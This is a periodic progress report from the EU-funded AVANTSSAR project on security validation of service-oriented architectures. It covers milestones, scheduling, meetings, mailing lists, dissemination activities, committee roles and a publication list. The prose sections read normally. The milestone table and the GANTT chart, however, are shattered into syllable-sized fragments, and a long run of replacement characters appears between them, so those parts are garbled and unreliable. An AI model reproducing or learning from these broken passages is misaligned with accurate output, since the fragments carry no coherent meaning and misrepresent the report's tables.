Project Number: FP7-ICT-2007-1, Project No. 216471Project Acronym: AVANTSSARTitle: Automated VAlidatioN of Trust and Security of Service-oriented AR-chitecturesDeliverable no: D6.1Title: AVANTSSAR Website and packageDue date: 01.01.08 – 31.12.10Delivery Date: ongoingShort Description: The website (www.avantssar.eu) is active and updatedregularly. The AVANTSSAR package is in preparation.Partners contributed: allMade available to: public



4.2 Milestones listThe project comprises 6 major milestones, which provide its major deci-sion points, and which are synchronized with the 6 project meetings. The2 milestones of Period P2 are shown in Table 3. Both have been achievedas verified during the second synchronization meeting (month 18) for MS3,and on month 24 (in particular, at the delivery of D4.1) and while writingthis periodic progress report in preparation for the second review meeting(at month 26) for MS4.



Table3:

Mile

ston

es(and

decisio

npo

ints)

Mile

ston

eno

.Mile

ston

ena

me

WPsno

’s.

Lead

bene

ficiary

Deliveryda

tefrom

Ann

exI

(projmon

th)

Achieved

Yes/N

oActua

l/Fo

recast

deliv

eryda

teCom

ments

MS3

ASL

anv.2

(static

ally

compo

sed

services

and

policies),

Valid

a-tor

and

Orchestrator

prototyp

es,

and

First

form

alisa

tion

ofprob

-lem

cases

2,4,

5UGDIST

mon

th18

(secon

dsyn-

chronizatio

nmeetin

g)

Yes

mon

th6

MS4

Reasoning

techniqu

esfor

ASL

anv.2

spec-

ificatio

ns,

Platform

prototyp

e,Assess-

ment

v.2,

ASL

anfor

indu

stry

1,3,

4,5

UPS

-IRIT

mon

th24

(sec-

ond

review

meetin

g)

Yes

mon

th24

(and

mon

th26

)The

achievem

ent

ofthe

mile

ston

eha

sbe

enverifi

edon

mon

th24

(inpa

rticular,

atthe

deliv

ery

ofD4.1)

and

while

writ

ing

this

perio

dicprog

ress

repo

rtin

preparation

forthesecond

review

meetin

g(at

mon

th26).



5 Project Management5.1 Project Planning and Timetable (GANTT Chart)AGANTT chart showing the scheduling of the workpackages and the progressmade is given in Figure 5: it depicts the timelines of the single workpack-ages and their sub-workpackages, as well as the 7 planned project meetings(a kick-off meeting, 3 synchronization meetings attended by all consortiumpartners, and 3 project review meetings) and the principal additional meet-ings that took place in period P2. This chart is the updated version of theoriginal chart given in the Description of Work (Annex I) and of the chartgiven in Deliverable D1.3 “Deliverable 1.3: Progress/Assessment Report forYear 1” [AVA08a].

5.2 Project Management and CoordinationProject management during the second project period was unproblematic.No problems occurred and thus no deviations from the planned deliverablesand milestones were necessary, except for the minor, natural, adjustments tothe timetable — for the delivery of the deliverables and achievement of themilestones — described in the previous section (all carried out in accordancewith the Project Officer). Given the complexity of the technical objectives,particular attention has been paid to the coordination of the activities andcommunication between project partners.

5.2.1 Project Meetings

Project meetings have played (and will play) a pivotal role in the coordinationand synchronization of activities among the partners, as they have fosteredcommunication between the beneficiaries and synergies and cross-fertilizationof approaches and results.

The meetings of Period P2 are listed in Section 6, specifying venues,dates, and participants, along with costs that the participants incurred to.For readability, we have divided them into three categories:

• General project meetings, which include the planned project meetingsas well as other meetings organized for the Consortium to discuss andwork on specific workpackages and deliverables,

• Working meetings, which are small to medium size meetings betweenproject participants to work on specific project topics.



��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

��

WP

3.2

Mod

.−C

h. P

. w.r

.t. S

.

WP

3.3

Atta

cker

Mod

els

WP

3.4

Com

p. R

eas.

for

S.&

P.

WP

3.5

Abs

. for

Com

p. S

.&P

.

WP

4.1

TS

Orc

hest

rato

r

WP

4.2

TS

Val

idat

or

WP

4.3

Pla

tform

Inte

grat

ion

WP

5.1

Def

. Pb.

Cas

es

WP

5.2

For

m. P

b. C

ases

WP

5.3

Val

. Pb.

Cas

es

WP

5.4

Ass

essm

ent

WP

6.1

Dis

sem

inat

ion

WP

6.2

Mig

ratio

n in

dust

ry

WP

6.3

Mig

ratio

n S

tand

. Org

.

WP

2.2

WP

2.3

WP

2.1

WP

2

WP

6

WP

5

WP

5.3

WP

5.1

WP

5.2

WP

4

WP

4.1

WP

4.2

WP

4.3

43

21

56

78

910

1112

1314

1516

1718

1920

2122

2324

2526

2728

2930

3132

3334

3635

Mon

th

kick

−of

f mee

ting

WP

1

WP

5: P

roof

of

conc

ept

WP

2: M

odel

ling

trus

t an

d se

curi

ty a

spec

ts o

f SO

A

WP

4: T

he A

VA

NT

SSA

R v

alid

atio

n pl

atfo

rm

WP

3 W

P3:

Aut

omat

ed r

easo

ning

tec

hniq

ues

WP

6: D

isse

min

atio

n an

d in

dust

ry m

igra

tion

WP

6.1

WP

6.2

WP

6.3

WP

5.4

final

rev

iew

mee

ting

Pro

ject

man

agem

ent

1st r

evie

w m

eetin

g

1st m

odel

ing

mee

ting

2nd

mod

elin

g m

eetin

g

1st s

ync

mee

ting

WP

3&W

P4

mee

ting

WP

2&W

P3

mee

ting

WP

2&W

P3

mee

ting

2nd

sync

mee

ting

3rd

sync

mee

ting

WP

2 m

eetin

gW

P4

mee

ting

2nd

revi

ew m

eetin

g

proj

ect w

orks

hop

mee

ting

Gen

eral

mee

ting

and

2nd

Pro

gres

s so

far

WP

3.2

WP

3.3

WP

3.4

WP

3.5

WP

3.1

WP

2.1

Initi

al A

SLa

n

WP

2.2

Ext

ende

d A

SLa

n

WP

2.3

Fin

al A

SLa

n

WP

2: M

od. T

&S

of S

OA

WP

3: A

uto.

rea

s. t

echn

.W

P4:

AV

AN

TSS

AR

Val

. P.

WP

5: P

roof

of

conc

ept

WP

6: D

iss.

and

ind.

mig

r.W

P1:

Pro

ject

Man

agem

ent

WP

3.1

Sat

. of A

SLA

N P

.

Figure 5: GANTT Chart of the AVANTSSAR Project



• Participation to European and scientific events, which list participationto conferences and other events for the dissemination of the projectresults, including events organized by the European Commission.

In addition to these physical meetings, a number of “unscheduled” virtualmeetings have been organized regularly with the help of the SAP ConnectPortal, an audio and web conferencing system that provides a virtual meetingroom where participants can share files and work on them in real time. Thesemeetings have proved to be a very useful (and cost-effective) means of sharinginformation, discussing research issues, and preparing project material. Wewill thus use the portal to hold virtual meetings on a regular basis until theend of the project.

5.2.2 Task-forces

The formation of task-forces (comprising experts from all the partners) hasbeen a very effective coordination measure to tackle well-defined, criticaltechnical issues, such as the definition of the ASLan and of the ISSLs, as wellas the implementation and assessment of the first version of the AVANTS-SAR Validation Platform.

5.2.3 Website

The website of the AVANTSSAR project is

www.avantssar.eu

and includes:

• A general introduction to the project: the objectives, the expectedresults, the milestones, the detailed description of the consortium andits coordinates within the Seventh Framework Programme.

• Publications originated from the project, both in the scientific commu-nity and in the general press.

• A subpage about the AVANTSSAR Platform.

• Links to the forerunner projects AVISPA and AVISS.

• A number of relevant links: other projects, institutions and companiesthat are related to AVANTSSAR.



• An internal protected section, containing contact details, internal mail-ing lists, details about the meetings (slides, notes and so on) and othertemporary technical information needed by the consortium.

• A protected section containing the deliverables and other documentsfor the European Commission.

• Links to events taking place in the context of the project: meetings,conferences, and workshops.

• News about the AVANTSSAR project, including, for instance, linksto articles and a demo-video about the serious vulnerability of theSAML-based Single Sign-On Service offered by the informatics giantGoogle [ACC+08] that we discovered.

Besides for the website, communication and information exchange amongthe members of the project is enforced via a carefully organized and main-tained central repository and a number of dynamically created mailing lists.

5.2.4 Mailing lists

The following mailing lists have proved to be very useful means of exchangingideas and coordinating activities:

• [email protected] is devoted to

– the exchange information between the partners,– the organization of consortium-wide editorial activities such as the

writing of a deliverable, as well as– general announcements such as organizing a project meeting or

advertising a new project publication.

This mailing list comprises all the scientists from the partner groups.

• [email protected] is devoted to the discussion be-tween all the site leaders.

• [email protected] is devoted to the discussion of ad-ministrative, financial, and management issues. This mailing list in-cludes all the site leaders plus a restricted number of senior researchersand administration staff.

• [email protected] is the address of the administrators of theproject website, namely the members of UNIVR, with the support ofmembers of UGDIST.



5.2.5 SVN Server

The use of a SVN (Subversion) Server has proved to be a fundamental in-strument for the management and sharing of project data. SVN allows forthe concurrent management of (different versions of) files and it proved veryvaluable for the project: software and documents (e.g. deliverables and publi-cations) are now routinely and effectively managed, shared and jointly editedvia SVN by the AVANTSSAR personnel.

5.3 Use of foreground and dissemination activities5.3.1 Project Workshops and Conferences, Lectures, Tutorials

The second project workshop took place in Verona, Italy, on January 14 and15, 2010, in conjunction with the regular project synchronization meeting.Participants from all project partners presented summaries of their achieve-ments during the second reporting period. (The workshop was originallyplanned for 2009 but has been co-located with the synchronization meetingto minimize costs and maximize attendance.)

As described in more detail in Deliverable D1.2 “Basic Dissemination andUse Plan”, a final Project Workshop is scheduled for 2010 and will be open toexternal participants (co-located with a one-day “Dissemination Workshop”).

Additionally, the members of AVANTSSAR have been playing (and willplay) an active role in the organization of a number of scientific events.Subsection 5.4 lists the events that took place, or whose organization hasbegun, during the second reporting period. In particular, AVANTSSARsupports the ARSPA workshop series:

• ARSPA is a series of workshops on Automated Reasoning for SecurityProtocol Analysis that was started during the AVISPA project (thepredecessor of AVANTSSAR) and that will be carried on in the context,and with the support, of AVANTSSAR.

• ARSPA-WITS’09: in 2009, ARSPA has again joined forces with theWITS workshop, in the context of the ETAPS 2009 conference (22-29March, 2009, York, UK). The co-chairs of ARSPA-WITS’09 were Pier-paolo Degano (of the University of Pisa, and of the Sensoria project)and Luca Viganò of UNIVR. More information is available on theproject’s website http://www.avantssar.eu/arspa-wits09/

• ARSPA-WITS’10: in 2010, ARSPA again joins forces with the WITSworkshop, in the context of the ETAPS 2010 conference (Paphos, Cyprus,March 27-28, 2010). The co-chairs of ARSPA-WITS’09 are Alessandro



Armando of UGDIST and Gavin Lowe (Oxford University). More in-formation is available on the project’s website http://www.avantssar.eu/arspa-wits10/

Moreover, we have been presenting our work at international conferencesand forums on computer security, software architectures, and automated rea-soning, as illustrated by the AVANTSSAR publications and talks listed inthe Subsection 5.5 and Subsection 5.7.

The industrial partners have also been carrying out local dissemination,and the whole consortium has been involved in clustering and standardiza-tion activities. These activities are described in quite some detail in De-liverable D1.2 “Basic Dissemination and Use Plan”, so here we only brieflyindicate some projects and organizations relevant to the on-going work (atinternational or national level) and with which information exchange mightbe beneficial.

5.3.2 European and international projects and working groups

Members of the AVANTSSAR consortium participate in (or are in close con-tact with the initiators and members of) several related European and inter-national projects and working groups, including:

• COST Action IC0901: Rich-Model Toolkit – An Infrastructure for Re-liable Computer Systems (Nov. 2009 – Oct. 2013). The action isrelevant through its design of language with rich modeling features,and through its work on decision procedures, including SAT checking.From the AVANTSSAR project, Marius Minea is representing Roma-nia as Management Committee member for Romania, and AlessandroArmando is partipating from Italy.

• DEPLOY: Industrial deployment of system engineering methods pro-viding high dependability and productivity. FP7 project, Feb 2008 –Jan 2012, http://www.deploy-project.eu/index.html.The Deploy project concerns developing critical systems by refinementusing the Event-B formalism. The main focus is on embedded systems,but the project will also explore security aspects of such systems. ETHZurich is the focal point for the security activities and can serve as ahub for collaboration here. Point of contact for Deploy: David Basin.

• IFIP WG 1.7 Theoretical Foundations of Security Analysis and Design,http://www.dsi.unive.it/IFIPWG1_7/. Luca Viganò of UNIVR is amember of the working group.



• MASTER: Managing Assurance, Security and Trust for sERvices. FP7project, Feb 2008 – Jan 2011, http://www.master-fp7.eu/index.php.

• PrimeLife: Bringing sustainable privacy and identity management tofuture networks and services. FP7 project, Mar 2008 – Feb 2011, http://www.primelife.eu.The PrimeLife project is related in several regards. First of all, PrimeLife is concerned with improving privacy-friendly technologies suchas IBM’s Identity Mixer, which is one of the major case studies inAVANTSSAR. We already have a close collaboration between thesetwo projects at the IBM site. In particular, we discuss our formal-ization of the Identity Mixer directly with its developers. Moreover,PrimeLife is also related to questions of access control policies andtheir composition. The privacy-friendly credential-based access controllanguage CARL has been developed in collaboration of AVANTSSARand PrimeLife at IBM (see WP 6 description).

• R4eGov: Towards e-Administration in the large. FP6 project, Mar2006 – Feb 2009, http://www.r4egov.eu.

• SENSORIA: Software Engineering for Service-Oriented Overlay Com-puters, FP6 project, Sep 2005 – Aug 2009, http://www.sensoria-ist.eu. Luca Viganò of UNIVR acted as an associated researcher of theSensoria project.

• SPOCS: Simple Procedures Online for Crossborder Services. Siemensparticipates in the FP7 e-government project SPOCS, CIP-ICT PSP-2008-2 no238935, http://www.eu-spocs.eu/, started in June 2009.Among others, SPOCS specifies the security architecture for prototyp-ical service portal implementations related to the EU Services Directive.SIEMENS is going to formalize and verify the security architecture us-ing the AVANTSSAR toolset, whereby valuable feedback is anticipatedin both directions between the projects.

• WASP: Wirelessly Accessible Sensor Populations. FP6 project, Sep2006 – Feb 2010, http://www.wasp-project.org.

Luca Viganò of UNIVR and Volkmar Lotz and Alessandro Sorniotti ofSAP represented AVANTSSAR and presented the project at the BLED con-ference “Towards a European approach to the Future Internet”, held in Bled,Slovenia, March 30 – April 2, 2008.



Some of the members of the AVANTSSAR team, including ETH Zurich,INRIA, SAP, SIEMENS, and UNIVR also participate, at different levels,in the activities of the European Research Consortium in Informatics andMathematics (ERCIM), in particular, ERCIM’s Working Group on Securityand Trust Management, which aims at steering the research of ERCIM in-stitutions on a series of activities (e.g., research projects, workshops, dissem-ination of knowledge) for fostering the European research and developmenton security, trust and privacy in ICT. These are among the main issues ofcurrent and future research efforts for “security in Europe” (cf., for exam-ple, http://www.cordis.lu/security). We thus expect that the results ofAVANTSSAR will be beneficial for this ERCIM WG, which will in turn pro-vide a major forum for the peer-evaluation and dissemination of our results.

France

• INRIA: ACCESS is an INRIA ARC project that has started in 2010between Lille, Saclay and Nancy. ACCESS is concerned with the se-curity and access control for Web data exchange. It aims at definingautomatic verification methods for checking properties of access con-trol policies (ACP) for XML, like consistency and for the comparisonof ACPs. Formal tools from tree automata theory will be applied forthis purpose.

• UPS-IRIT: Philippe Balbiani is the leader of ARA SSIA COPS. Lilacis also part of the ROSACE (Robots et systèmes, auto-adaptatifs, com-municants et embarqués) project, which aims at studying and develop-ing means to design, specify, implement and deploy a set of mobile au-tonomous communicating and cooperating robots with well-establishedproperties particularly in terms of safety, self-healability, ability toachieve a set of missions and self-adaptation in a dynamic environment.The project is focused on the associated software (models, algorithmsand systems). We propose to address in a systematic and convergentapproach the robotics software levels and the specific constraints im-posed to the middleware level corresponding to the real-time embeddedsystems as well as network and inter-communication level management.ROSACE will bring together a strong research consortium composedof research teams from three laboratories (CERT-ONERA, IRIT andLAAS-CNRS) for making real progress in this area: an active and cen-tral object - namely a fleet of cooperative robots - is critical for keepingthe difficult and ambitious scientific and technical work well groundedin relevant realities and well focused on actual needs.



Germany SIEMENS participates to:• BITKOM AK (working group) SOA Technologies,

http://www.bitkom.org/de/themen_gremien/18151.aspx

• CAST workshops on SOA Security,http://www.cast-forum.de/workshops/infos/103

• TeleTrusT project group SOA Security, http://teletrust.de

Italy• UNIVR participates to the PRIN’07 project “SOFT—Tecniche formali

orientate alla sicurezza”, Sep 2008 – Aug 2010.

• UGDIST coordinates the PRIN’07 project “Integrating automated rea-soning in model checking: towards push-button formal verification oflarge-scale and infinite-state systems”, Sep 2008 – Aug 2010.

Romania• Practical Formal Verification Using Automated Reasoning and Model

Checking. INTAS research grant 8144, Sep 2006 – May 2009, http://www.risc.uni-linz.ac.at/projects/intas

• CONQUERS: Continuous Quality Evaluation and Restructuring of Soft-ware. Romanian national research grant, Oct 2007 – Sep 2010, http://loose.upt.ro/conquers . Relevant to AVANTSSAR is a task onextraction and composition of component and service interfaces.

• IEAT has won a 20-month Romanian national grant (2009–2010) sup-plementing FP7 participation in AVANTSSAR. This grant allows IEATto provide additional person-months to the project and to finance partof the participation in AVANTSSAR project meetings and conferences.

Switzerland• ETH Zurich is involved in the project VerSePro (funded by the Swiss

National Science Foundation SNSF) together with the Ecole Polytech-nique Federale de Lausanne EPFL. This 4-year project, which startedin the autumn of 2005, aims at the development and verification ofsecurity and privacy protocols for wireless networks. We thus expectthat it will be possible to re-use in AVANTSSAR some of the techniquesdeveloped in VerSePro and vice versa. Point of contact for VerSePro:David Basin.



• ETH Zurich is involved in the project ComposeSec (funded by theHasler Foundation). This 3-year project, which started in September2007, aims at analyzing complex protocol suites or services built bycombining networked components. The goal of this project is to developeffective compositional methods, with accompanying tool support, totackle this problem. This includes foundational work on bridging thegap between currently used security protocol models and high-levelanalysis models of composed services. Point of contact for ComposeSec:Cas Cremers.



5.4 Involvement of project participants in scientific eventsScientific events sponsored by AVANTSSAR

1. ARSPAWorkshop series on Automated Reasoning for Security Protocol Analy-sis.Several project participants, rotating yearly.

2. ARSPA-WITS’09Joint Workshop on “Automated Reasoning for Security Protocol Anal-ysis and Issues in the Theory of Security”, affiliated with ETAPS 2009.York, UK, March 28 and 29, 2009.Luca Viganò (UNIVR) co-chair.Luca Compagna (SAP) and Sebastian Mödersheim (IBM) PC mem-bers.

3. Special issue of the Journal of Automated Reasoning on “ComputerSecurity: Foundations and Automated Reasoning” in connection withthe “Joint Workshop on Foundations of Computer Security, AutomatedReasoning for Security Protocol Analysis and Issues in the Theory ofSecurity” (FCS-ARSPA-WITS’08).Luca Viganò (UNIVR) co-editor.

4. ARSPA-WITS’10Joint Workshop on “Automated Reasoning for Security Protocol Anal-ysis and Issues in the Theory of Security”, affiliated with ETAPS 2010.Paphos, Cyprus, March 27 and 28, 2010.Alessandro Armando (UGDIST) co-chair.Luca Viganò (UNIVR), Cas Cremers (ETH Zurich), Michael Rusi-nowitch (INRIA), Yannick Chevalier (UPS-IRIT), Sebastian Möder-sheim (IBM), Luca Compagna (SAP) and Jorge Cuellar (SIEMENS)PC members.

Other scientific events

5. FCSWorkshop series on the Foundations of Computer Security.Luca Viganò (UNIVR) chair of the Steering Committee.

6. FCS’09Workshop on Foundations of Computer Security (Affiliated with LICS’09).Los Angeles, California, USA, August 10, 2009.Luca Viganò (UNIVR) and Cas Cremers (ETH Zurich) PC members.



7. ADDCT’09Workshop on Automated Deduction: Decidability, Complexity, Tractabil-ity (Affiliated with CADE-22).McGill University, Montreal, Canada, August 2–7, 2009.Luca Viganò and Silvio Ranise (UNIVR) PC members.

8. ARES’09International Dependability Conference.Fukuoka, Japan, March 16–19 2009.Luca Viganò (UNIVR) PC member.

9. ESORICS’0914th European Symposium on Research in Computer Security.Saint Malo France, September 21–25, 2009.Luca Viganò (UNIVR) and David Basin (ETH Zurich) PC members.

10. FIS’09The Second Future Internet Symposium.Berlin, Germany, September 1–3, 2009Luca Viganò (UNIVR) and Alessandro Armando (UGDIST) PC mem-bers.

11. FMWS’09Second International Workshop on Formal Methods for Wireless Sys-tems (Satellite workshop of CONCUR 2009).Bologna, Italy, September 1–4, 2009.Luca Viganò (UNIVR) PC member.

12. SECREYPT’09International Conference on Security and Cryptography.Milan, Italy, July 7–10, 2009.Luca Viganò (UNIVR) PC member.

13. SECURWARE’09The Third International Conference on Emerging Security Information,Systems and Technologies.Athens/Glyfada, Greece, June 18–23, 2009.Luca Viganò (UNIVR) PC member.

14. STM’095th International Workshop on Security and Trust Management (Inconjunction with ESORICS’09).



Saint Malo France, September 24–25, 2009.Luca Viganò (UNIVR) and Cas Cremers (ETH Zurich) PC members.

15. AVOCSWorkshop on Automated Verification of Critical Systems.Swansea University, UK, 23-25 September 2009.Silvio Ranise (UNIVR) PC member.

16. AVOCSWorkshop on Automated Verification of Critical Systems.University of Düsseldorf, Germany, 20-23 September 2010.Silvio Ranise (UNIVR) PC member.

17. PAARFLoC/IJCAR’10 Workshop on Practical Aspects of Automated Rea-soning.Edinburgh, UK, July 2010.Silvio Ranise (UNIVR) PC member.

18. FroCoSInternational Symposium on Frontiers of Combining Systems.Trento, Italy, September 16–18, 2009.Silvio Ranise (UNIVR) PC member.

19. SMTInternational Workshop on Satisfiability Modulo Theories (affiliatedwith CADE 2009).McGill University, Montreal, Canada, August 2–3, 2009.Silvio Ranise (UNIVR) PC member.

20. FTPInternational Workshop on First-Order Theorem Proving (co-locatedwith TABLEAUX 2009).University of Oslo, Norway, July 6–7 2009Silvio Ranise (UNIVR) PC member.Michael Rusinowitch (INRIA) PC member.

21. SAC’0924th ACM Symposium on Appplied ComputingHonolulu, USA, March 8–12, 2009. David Basin (ETH Zurich) PCmember.

22. ASIACCS’094th ASIA Computer and Communication Security Conference



Sidney, Australia, March 2009.David Basin (ETH Zurich) PC member.

23. iNetSec’09Workshop on Open Research Problems in Network Security.Zurich, Switzerland, April 2009.David Basin (ETH Zurich) PC member.

24. WiSec’092nd ACM Conference on Wireless Network Security.Zurich, Switzerland, May 2009.David Basin (ETH Zurich) Conference Chair.

25. SecReT’094th International Workshop on Security and Rewriting Techniques.New York, USA, July 2009.David Basin (ETH Zurich) PC member.

26. EUROPKI’09The sixth European PKI Workshop.Pisa, Italy, September 9-11, 2009.Cas Cremers (ETH Zurich) PC member.

27. SAC SVT 2010Software Verification and Testing Track at the ACM Symposium onApplied Computing.Lausanne, Switzerland, March 22-26, 2010.Mohammad Torabi Dashti (ETH Zurich) PC member.

28. ASIACCS’10ACM Symposium on Information, Computer and Communications Se-curity (ASIACCS).Beijing, China, March 2010.David Basin (ETH Zurich) Program Chair.Michael Rusinowitch (INRIA) PC member.

29. CADE22nd International Conference on Automated Deduction.McGill University, Montreal, Canada, August 2–7, 2009Michael Rusinowitch (INRIA) PC member

30. CRISISThe 4th International Conference on Risks and Security of Internet



and Systems 2009 (IEEE technical co-sponsorship in cooperation withACM SIGSAC Supported by SEE).Toulouse, France October 19–22, 2009.Michael Rusinowitch (INRIA) PC member

31. SARSSI’09Conférence sur la sécurité des architectures réseaux et des systèmesd’information.Luchon, France, June 22–26, 2009.Michael Rusinowitch (INRIA) PC member

32. 1st Luxembourg Day on Security and Reliability.University Campus Kirchberg, Luxembourg city, Luxembourg, Febru-ary 10, 2009.Michael Rusinowitch (INRIA) PC member

33. ASE201025th IEEE/ACM International Conference on Automated Software En-gineering.Antwerp, Belgium, September 20–24, 2010.Alessandro Armando (UGDIST), PC member

34. IJCAR 20105th International Joint Conference on Automated Reasoning.Edinburgh, Scotland, July 16–19, 2010.Alessandro Armando (UGDIST), PC member

35. AISC 201010th International Conference on Artificial Intelligence and SymbolicComputation.Paris, France, July 5–6, 2010.Alessandro Armando (UGDIST), PC member

36. Secret 2010Workshop on Security and Rewriting Techniques.Port Jefferson, New York, USA, July 10–11, 2009.Yannick Chevalier (UPS-IRIT), PC member

37. ARES 2010The Fifth International Conference on Availability, Reliability and Se-curity.Krakow,Poland, February 15–18, 2010.Sebastian Mödersheim (IBM), PC member



38. FM’0916th International Symposium on Formal Methods.Eindhoven, the Netherlands, November 2–6, 2009.Jorge Cuellar (SIEMENS), Marius Minea (IEAT) PC members.

39. SAC SEC 2009Security Track at the ACM Symposium on Applied Computing.Honolulu, USA, March 8–12, 2009. Giampaolo Bella and Luca Com-pagna (SAP) co-chairs.

40. SAC SEC 2010Security Track at the ACM Symposium on Applied Computing.Lausanne, Switzerland, March 22–26, 2010. Luca Compagna and Alessan-dro Sorniotti (SAP) co-chairs. Cas Cremers (ETH Zurich) PC member.



5.5 AVANTSSAR publications and draftsDuring the second year, the project participants produced 30 papers pub-lished or currently in print about the project’s foreground, thus amountingto 49 papers since the start of the project. Moreover, 7 more papers are cur-rently submitted and further papers are in preparation. Last but not least,4 PhD theses have been completed on AVANTSSAR research.

AVANTSSAR publications

[1] H. Abdelnur, T. Avanesov, M. Rusinowitch, and R. State. AbusingSIP Authentication. Journal of Information Assurance and Security,4(4):311-318, 2009.

[2] S. Anantharaman, H. Lin, C. Lynch, P. Narendran, and M. Rusinow-itch. Unification modulo homomorphic encryption. In Proceedings ofFrontiers of Combining Systems, 7th International Symposium, FroCoS2009., LNCS 5749. Springer-Verlag, 2009.

[3] A. Armando, R. Carbone, and L. Compagna. LTL Model Checkingfor Security Protocols. Journal of Applied Non-Classical Logics, specialissue on “Logic and Information Security”, vol. 19/4, pp. 403-429, 2009.

[4] A. Armando, E. Giunchiglia, and S. E. Ponta. Formal specificationand automatic analysis of business processes under authorization con-straints: An action-based approach. In G. Pernul, S. Fischer-Huebner,and C. Lambrinoudakis, editors, TrustBus’09: Proceedings of the 6th In-ternational Conference on Trust, Privacy and Security in Digital Busi-ness, pages 63–72, 2009. Springer-Verlag.

[5] A. Armando and S. E. Ponta. Model Checking of Security-sensitiveBusiness Processes. In P. Degano and J. Guttman, editors, Proceedingsof the 6th International Workshop on Formal Aspects in Security andTrust (FAST2009). Springer-Verlag. To appear.

[6] C. Arora and M. Turuani. Validating integrity for the ephemerizer’s pro-tocol with CL-atse. Papers Issued from the 2005-2008 French-JapaneseCollaboration, LNCS 5458, pages 21-32. Springer-Verlag, 2009.

[7] W. Arsac, G. Bella, X. Chantry, and L. Compagna. Attacking EachOther. In 17th International Workshop on Security Protocols (IWSP2009), LNCS. Springer-Verlag, 2009.



[8] W. Arsac, G. Bella, X. Chantry, and L. Compagna. Validating SecurityProtocols under the General Attacker. In Joint Workshop on AutomatedReasoning for Security Protocol Analysis and Issues in the Theory ofSecurity (ARSPA-WITS 2009), ENTCS. Elsevier-Science, 2009.

[9] P. Balbiani, Y. Chevalier, and M. el Houri. Approche logique pour lescontraintes de contrôle d’accès dans les services web. Presented at theInforsid/SDEC 2009 workshop, 2009.

[10] P. Balbiani, Y. Chevalier, and M. el Houri. A logical framework forreasoning about policies with trust negotiations and workflows in a dis-tributed environment. Proceedings of the 4th International Conferenceon Risks and Security of Internet and Systems (Crisis’2009), 2009.

[11] P. Balbiani, F. Cheikh, and G. Feuillade. Résultats de complexité pourle problème de la composition d’agents. Cinquièmes Journées Franco-phones Modèles Formels de l’Interaction (MFI 09), to appear.

[12] P. Balbiani, F. Cheikh, and G. Feuillade. Controller/orchestrator syn-thesis via filtration. Methods for Modalities (M4M 2009), ElectronicNotes in Theoretical Computer Science, to appear.

[13] P. Balbiani, F. Cheikh, P.-C. Héam, and O. Kouchnarenko. Compositionof services with constraints. Formal Aspects of Component Software,Electronic Notes in Theoretical Computer Science, to appear.

[14] M. Barletta, S. Ranise, and L. Viganò. Verifying the Inter-play of Authorization Policies and Workflow in Service-Oriented Ar-chitectures. In Proceedings of the 2009 International Symposiumon Secure Computing (SecureCom 2009), Volume 3 of 2009 In-ternational Conference on Computational Science and Engineering(CSE 2009), pages 289–299. IEEE Computer Society Press, 2009.http://doi.ieeecomputersociety.org/10.1109/CSE.2009.172.

[15] A. Brucker and S. Mödersheim. Integrating Automated and InteractiveProtocol Verification. In P. Degano and J. Guttman, editors, Proceedingsof the 6th International Workshop on Formal Aspects in Security andTrust (FAST2009). Springer-Verlag. To appear.

[16] Y. Chevalier, M.A. Mekki, and M. Rusinowitch. Orchestration undersecurity constraints. In P. Degano and J. Guttman, editors, Proceedingsof the 6th International Workshop on Formal Aspects in Security andTrust (FAST2009). Springer-Verlag. To appear.



[17] Y. Chevalier and M. Rusinowitch. Compiling and securing cryptographicprotocols. CoRR, abs/0910.5099, to appear.

[18] N. Chridi, M. Turuani, and M. Rusinowitch. Decidable Analysis for aClass of Cryptographic Group Protocols with Unbounded Lists. In Pro-ceedings of the 22nd IEEE Computer Security Foundations Symposium(CSF’09), pages 277-289. IEEE Computer Society, 2009.

[19] L. Compagna, U. Flegel, and V. Lotz. Towards Validating SecurityProtocol Deployment in the Wild. In SAPSE 2009. IEEE ComputerSociety Press, 2009.

[20] B. Groza and M. Minea. A calculus to detect guessing attacks. In Pro-ceedings of the 12th International Conference on Information Security,LNCS 5735, pages 59–67. Springer-Verlag, 2009.

[21] B. Groza and M. Minea. A formal approach for automated reasoningabout off-line and undetectable on-line guessing (short paper). In Pro-ceedings of the 14th International Conference on Financial Cryptographyand Data Security, LNCS. Springer-Verlag, to appear.

[22] A. Imine, A. Cherif, and M. Rusinowitch. A Flexible Access ControlModel for Distributed Collaborative Editors. In Secure Data Manage-ment, 6th VLDB Workshop, SDM 2009, LNCS 5776, pages 89–106,Springer-Verlag, 2009.

[23] S. Mauw, S. Radomirović, and M. Torabi Dashti. Minimal messagecomplexity of asynchronous multi-party contract signing. In Proceedingsof the 22nd IEEE Computer Security Foundations Symposium (CSF’09),pages 13–25. IEEE Computer Society, 2009.

[24] S. Mödersheim. Algebraic Properties in Alice and Bob Notation. InProceedings of Ares 2009. IEEE Computer Society, 2009. Extendedversion available as IBM Research Report RZ3709.

[25] S. Mödersheim and L. Viganò. Secure Pseudonymous Channels. InProceedings of Esorics’09, LNCS 5789, pages 337–354. Springer-Verlag,2009. Extended version: Technical Report RZ3724, IBM Zurich Re-search Lab, 2009, domino.research.ibm.com/library/cyberdig.nsf.

[26] S. Mödersheim and L. Viganò. The Open-Source Fixed-Point ModelChecker for Symbolic Analysis of Security Protocols. In FOSAD2008/2009, LNCS 5705, pages 166–194. Springer-Verlag, 2009.



[27] S. Mödersheim, L. Viganò, and D. Basin. Constraint Differentiation:Search-Space Reduction for the Constraint-Based Analysis of SecurityProtocols. Journal of Computer Security, (to appear).

[28] S. Ranise. Towards Verification of Security-Aware Transaction E-services, 2009. In Proceedings of International Workshop on First-OrderTheorem Proving, Oslo, Norway, July 6-7 2009.

[29] C. Rudolph, L. Compagna, R. Carbone, A. Muñoz, and J. Repp. Ver-ification of S&D Solutions for Network Communications and Devices.In G. Spanoudakis, A. M. Gomez, and S. Kokolakis, editors, Securityand Dependability for Ambient Intelligence, volume 45 of Advances inInformation Security, pages 143–164. Springer, 2009.

[30] M. Torabi Dashti. Optimistic fair exchange using trusted devices. In Pro-ceedings of the 11th International Symposium on Stabilization, Safety,and Security of Distributed Systems (SSS 2009). Springer-Verlag, 2009.

AVANTSSAR drafts

